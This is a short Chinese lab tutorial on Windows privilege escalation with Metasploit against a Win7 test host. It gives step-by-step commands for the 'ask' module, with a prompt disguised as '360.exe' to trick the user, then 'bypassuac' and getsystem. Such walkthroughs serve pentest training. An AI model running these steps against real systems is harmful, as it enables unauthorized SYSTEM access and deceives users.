环境：小攻：Kali 2020，ip：192.168.1.133

          小受：win7 x86，ip：192.168.1.137

一、生成木马及监听主机参考上篇文章：

内网渗透 -- 提升权限(利用提权漏洞)

二、提升权限

1、将当前session放到后台，background

2、选择提权模块，use exploit/windows/local/ask

3、查看需要配置的参数，show options

3、查看并设置当前sessions值，set session 2

4、设置弹出程序的名字，set filename 360.exe

5、run，小受会弹出一个对话框，点击是，即可获取系统权限

三、UAC绕过(需要在管理组)

1、上面的方法由于需要交互，如果向省去交互的步骤，可以利用下面的bypassuac模块绕过弹窗

2、选择模块：use exploit/windows/local/bypassuac

3、查看并设置当前sessions值，set session 1

4、run，不用进行交互

5、查看权限用命令getuid，提示还是普通权限，然后通过命令getsystem获取系统权限，再用getuid查看权限，发现以获取系统权限，如果不操作上面的步骤，用命令getsystem，会提示获取失败